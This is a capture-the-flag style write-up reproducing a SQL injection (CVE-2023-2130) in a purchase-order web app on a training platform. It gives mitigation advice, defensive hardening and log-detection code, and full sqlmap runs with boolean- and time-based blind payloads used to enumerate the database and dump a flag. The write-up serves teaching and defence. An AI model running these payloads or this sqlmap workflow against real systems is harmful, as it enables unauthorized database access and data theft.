SourceCodester v1.0 SQL Injection (CVE-2023-2130)


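Preface

CVE-2023-2130 is a SQL injection vulnerability affecting SourceCodester Purchase Order Management System v1.0. It exists because the application fails to properly filter and validate user input, so arbitrary SQL commands can be executed through SQL injection, giving unauthorized access to the database and the ability to operate on it.

When this vulnerability is exploited, malicious SQL code inserted into input fields can be used to:

  1. Obtain sensitive data: for example user credentials and personal information.
  2. Modify or delete data: records in the database can be tampered with or deleted.
  3. Perform administrative operations: administrator privileges may be obtained and higher-level operations carried out.

The vulnerability has a severity rating of 9.8 (CVSSv3), which is high risk. The following measures mitigate it:

  1. Use prepared statements: prepared statements and parameterized queries effectively prevent SQL injection.
  2. Input validation and filtering: strictly validate and filter user input so that only legitimate input is accepted.
  3. Principle of least privilege: database users should hold only the minimum privileges needed for the operations they perform; avoid using high-privilege accounts for routine operations.
  4. Secure coding practices: adopt secure coding practices, such as using an ORM (object-relational mapping) framework for database operations, and avoid concatenating SQL statements by hand.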
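The first two mitigations, applied to the boolean-based payload that sqlmap reports later on this page. This is an added example, not code from the application or from the original article: SQLite stands in for MySQL so that it runs offline, and the function names and table contents are assumptions (only the `supplier_list` table name and the payload come from the page).

```python
import re
import sqlite3

# Constructed stand-in for the supplier_list table named in the sqlmap output.
# SQLite is used only so the example runs offline; the real system uses MySQL.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE supplier_list (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO supplier_list VALUES (?, ?)",
                   [(1, "Supplier A"), (2, "Supplier B")])
    return db

def view_details_vulnerable(db, raw_id):
    # The 'before' pattern: the request value is spliced into a quoted literal,
    # so a quote in raw_id ends the literal and the rest is parsed as SQL.
    sql = "SELECT id, name FROM supplier_list WHERE id = '" + raw_id + "'"
    return db.execute(sql).fetchall()

def bound_without_validation(db, raw_id):
    # Binding alone already neutralises the payload: it is compared as data.
    return db.execute("SELECT id, name FROM supplier_list WHERE id = ?",
                      (raw_id,)).fetchall()

def view_details_hardened(db, raw_id):
    # 1) Input validation: a supplier id is a short run of ASCII digits.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be a positive integer")
    # 2) Prepared statement: the value is bound, never parsed as SQL.
    return db.execute("SELECT id, name FROM supplier_list WHERE id = ?",
                      (int(raw_id),)).fetchall()

# Boolean-based blind payload reported by sqlmap on this page, and its
# always-false twin (constructed) that completes the true/false oracle.
TRUE_PAYLOAD = "2' AND 4461=4461 AND 'TVzr'='TVzr"
FALSE_PAYLOAD = "2' AND 4461=4462 AND 'TVzr'='TVzr"

if __name__ == "__main__":
    db = make_db()
    print(view_details_vulnerable(db, TRUE_PAYLOAD))   # row comes back
    print(view_details_vulnerable(db, FALSE_PAYLOAD))  # no row: a usable oracle
    print(bound_without_validation(db, TRUE_PAYLOAD))  # no row: treated as data
```

The differing results for the two payloads in the concatenated query are exactly the signal a boolean-based blind test relies on; with a bound parameter both payloads behave identically.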

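Chunqiu Yunjing (春秋云镜) is a platform focused on network security training and hands-on exercises. It aims to improve users' defensive capability and practical skills by simulating real network environments and scenarios. The platform mainly offers the following functions and features:

Hands-on exercises:

Provides a range of attack-and-defense exercise scenarios that simulate real network incidents, helping users master network security techniques through practice.

Scenarios cover web security, system security, network security, social engineering and other areas.

Vulnerability reproduction:

Users can reproduce known security vulnerabilities on the platform to understand their causes, exploitation methods and remediation measures.

Practical work helps users master the skills of exploiting and defending against vulnerabilities.

Teaching and training:

Provides systematic network security courses, from basic to advanced, covering multiple security areas and suited to users at different levels.

Courses combine theory with hands-on work to help students improve their security knowledge and practical ability across the board.

Competitions and assessment:

Holds regular network security competitions, such as CTF (Capture The Flag) contests, to stimulate students' interest and motivation.

Provides security skills assessments for individuals and teams, helping students understand their own skill level.

Resource sharing:

The platform provides a wealth of learning resources, including tutorials, tools and case studies, for users to consult and study at any time.

Users can share experience and resources in the community and learn from one another.

Chunqiu Yunjing is suited to network security practitioners, students and individuals interested in network security; continued study and hands-on exercises on the platform can effectively improve security skills and defensive capability.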

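Introduction

SourceCodester Purchase Order Management System v1.0 is a web-based application designed to simplify and manage the purchase order process. The system is aimed mainly at small and medium-sized businesses, to improve purchasing efficiency, reduce manual processing errors, and keep purchase records transparent and traceable.

Main features

  1. User management
  • The system lets administrators add, edit and delete user accounts and assign different permission levels, so that only authorized users can access and manage purchase orders.
  2. Supplier management
  • Users can add and manage supplier information, including supplier name, contact details and address. This helps in quickly selecting and contacting suppliers when creating purchase orders.
  3. Purchase order management
  • Users can create, edit and view purchase orders. Each order includes supplier information, order date, delivery date, order status and a detailed product list.
  4. Product management
  • The system allows product information to be added and managed, including product name, description, price and stock quantity. Users can select products when creating purchase orders.
  5. Reports and records
  • Provides detailed purchase order reports and history, so users can review past orders and current order status.
  6. Notification system
  • The system can send notifications reminding users to process new orders or update order status.

Technology stack

  • Front end: built with HTML, CSS and JavaScript, providing a user-friendly interface.
  • Back end: developed in PHP, handling business logic and database operations.
  • Database: uses MySQL to store and manage data, ensuring data persistence and integrity.

Installation and running

To install and run SourceCodester Purchase Order Management System v1.0, users need:

  1. Web server: such as Apache or Nginx.
  2. PHP environment: make sure PHP is installed and configured on the server.
  3. Database: set up a MySQL database and import the provided database script.

Advantages

  • Simplified purchasing process: systematic management improves the efficiency and accuracy of the purchasing process.
  • Easy to use: an intuitive user interface lets users get started quickly.
  • Flexible management: supports multiple users and permission management, ensuring the system's security and flexibility.

SourceCodester Purchase Order Management System v1.0 is a practical tool suited to businesses and organizations that want to optimize their purchasing process.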

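Reproduction

Open the target environment.

Going straight in requires logging in.

The page visited is as follows:

Try passing the id parameter.

Use SQLMap to enumerate the databases: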

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=2" --dbs   
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.4#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 20:44:28 /2024-07-05/
 
[20:44:28] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=2807ae4e6fb...91fa107729'). Do you want to use those [Y/n] n
[20:44:30] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:44:30] [INFO] testing if the target URL content is stable
[20:44:30] [INFO] target URL content is stable
[20:44:30] [INFO] testing if GET parameter 'id' is dynamic
[20:44:31] [INFO] GET parameter 'id' appears to be dynamic
[20:44:31] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[20:44:31] [INFO] testing for SQL injection on GET parameter 'id'
[20:44:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:44:31] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[20:44:33] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[20:44:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:44:34] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:44:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:44:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:44:35] [INFO] testing 'Generic inline queries'
[20:44:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:44:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:44:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:44:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:44:45] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[20:44:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:44:45] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:44:45] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:44:45] [INFO] target URL appears to have 8 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] n
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[20:44:52] [WARNING] if UNION based SQL injection is not detected, please consider usage of option '--union-char' (e.g. '--union-char=1') and/or try to force the back-end DBMS (e.g. '--dbms=mysql') 
[20:44:53] [INFO] target URL appears to be UNION injectable with 8 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[20:44:56] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 140 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr
 
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
---
[20:44:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP, PHP 7.3.33
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:44:58] [INFO] fetching database names
[20:44:58] [INFO] fetching number of databases
[20:44:58] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:44:58] [INFO] retrieved: 4
[20:44:58] [INFO] retrieved: information_schema
[20:45:05] [INFO] retrieved: mysql
[20:45:07] [INFO] retrieved: performance_schema
[20:45:13] [INFO] retrieved: purchase_order_db
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] purchase_order_db
 
[20:45:19] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com'

Enumerate the tables:

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=2" -D "purchase_order_db" --tables
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 20:48:52 /2024-07-05/
 
[20:48:52] [INFO] resuming back-end DBMS 'mysql' 
[20:48:52] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=78d32b89ed9...f529d4ed65'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr
 
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
---
[20:48:53] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:48:53] [INFO] fetching tables for database: 'purchase_order_db'
[20:48:53] [INFO] fetching number of tables for database 'purchase_order_db'
[20:48:53] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:48:53] [INFO] retrieved: 7
[20:48:54] [INFO] retrieved: item_list
[20:48:57] [INFO] retrieved: users
[20:48:59] [INFO] retrieved: supplier_list
[20:49:04] [INFO] retrieved: po_list
[20:49:07] [INFO] retrieved: system_info
[20:49:11] [INFO] retrieved: fllllaaaag
[20:49:16] [INFO] retrieved: order_items
Database: purchase_order_db
[7 tables]
+---------------+
| fllllaaaag    |
| item_list     |
| order_items   |
| po_list       |
| supplier_list |
| system_info   |
| users         |
+---------------+
 
[20:49:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com'


Enumerate the columns:

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=2" -D "purchase_order_db" -T "fllllaaaag" --columns
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.8.4#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 20:50:10 /2024-07-05/
 
[20:50:11] [INFO] resuming back-end DBMS 'mysql' 
[20:50:11] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=4a6065bd9e1...c4ebe38f25'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr
 
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
---
[20:50:12] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:50:12] [INFO] fetching columns for table 'fllllaaaag' in database 'purchase_order_db'
[20:50:12] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:50:12] [INFO] retrieved: 2
[20:50:13] [INFO] retrieved: id
[20:50:14] [INFO] retrieved: int(20)
[20:50:18] [INFO] retrieved: flag
[20:50:19] [INFO] retrieved: text
Database: purchase_order_db
Table: fllllaaaag
[2 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| flag   | text    |
| id     | int(20) |
+--------+---------+
 
[20:50:21] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com'

Dump the data:

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=2" -D "purchase_order_db" -T "fllllaaaag" -C "flag" --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.4#stable}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:50:39 /2024-07-05/
[20:50:40] [INFO] resuming back-end DBMS 'mysql' 
[20:50:40] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=c930771f176...8c2072b16f'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
---
[20:50:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:50:41] [INFO] fetching entries of column(s) 'flag' for table 'fllllaaaag' in database 'purchase_order_db'
[20:50:41] [INFO] fetching number of column(s) 'flag' entries for table 'fllllaaaag' in database 'purchase_order_db'
[20:50:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:50:41] [INFO] retrieved: 1
[20:50:42] [INFO] retrieved: flag{fd914d13-e36b-42df-8b11-881ffdfa8d5e}
Database: purchase_order_db
Table: fllllaaaag
[1 entry]
+--------------------------------------------+
| flag                                       |
+--------------------------------------------+
| flag{fd914d13-e36b-42df-8b11-881ffdfa8d5e} |
+--------------------------------------------+
[20:51:00] [INFO] table 'purchase_order_db.fllllaaaag' dumped to CSV file '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/dump/purchase_order_db/fllllaaaag.csv'
[20:51:00] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com'
[*] ending @ 20:51:00 /2024-07-05/
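
A defender's view of the runs above, as an added example that is not part of the original article: it scans web access logs for requests to `view_details.php` whose `id` is not a plain integer and tags the payload shapes sqlmap reported. The log lines are constructed, and the combined log format, the `ORDER BY` request and the rule names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [05/Jul/2024:20:44:10 +0800] "GET /admin/suppliers/view_details.php?id=2 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.9 - - [05/Jul/2024:20:44:31 +0800] "GET /admin/suppliers/view_details.php?id=2%27%20AND%204461%3D4461%20AND%20%27TVzr%27%3D%27TVzr HTTP/1.1" 200 1843 "-" "sqlmap/1.8.4#stable (https://sqlmap.org)"
203.0.113.9 - - [05/Jul/2024:20:44:40 +0800] "GET /admin/suppliers/view_details.php?id=2%27%20AND%20%28SELECT%204095%20FROM%20%28SELECT%28SLEEP%285%29%29%29HoPf%29%20AND%20%27jALb%27%3D%27jALb HTTP/1.1" 200 1843 "-" "sqlmap/1.8.4#stable (https://sqlmap.org)"
203.0.113.9 - - [05/Jul/2024:20:44:45 +0800] "GET /admin/suppliers/view_details.php?id=2%27%20ORDER%20BY%208--%20- HTTP/1.1" 200 1843 "-" "sqlmap/1.8.4#stable (https://sqlmap.org)"
"""

# client IP, request target and User-Agent from one combined-format line
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')

# Payload shapes taken from the sqlmap report on this page.
RULES = [
    ("boolean-blind", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
    ("time-blind", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("column-probe", re.compile(r"\b(?:ORDER\s+BY\s+\d+|UNION\s+(?:ALL\s+)?SELECT)", re.I)),
]

def scan(log_text, path="/admin/suppliers/view_details.php", param="id"):
    """Return (client_ip, tags, decoded_value) for every suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, target, agent = m.groups()
        url = urlsplit(target)
        if url.path != path:
            continue
        # parse_qs URL-decodes the value, so encoded payloads are matched too
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if value.isascii() and value.isdigit():
                continue  # the only shape a legitimate id takes
            tags = [name for name, rx in RULES if rx.search(value)]
            if agent.lower().startswith("sqlmap/"):
                tags.append("sqlmap-user-agent")
            findings.append((ip, tags or ["non-numeric-id"], value))
    return findings

if __name__ == "__main__":
    for ip, tags, value in scan(SAMPLE_LOG):
        print(ip, ",".join(tags), repr(value))
```

The non-numeric `id` check is the reliable signal; the User-Agent tag is only a convenience, since it disappears as soon as the client sends a different header.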

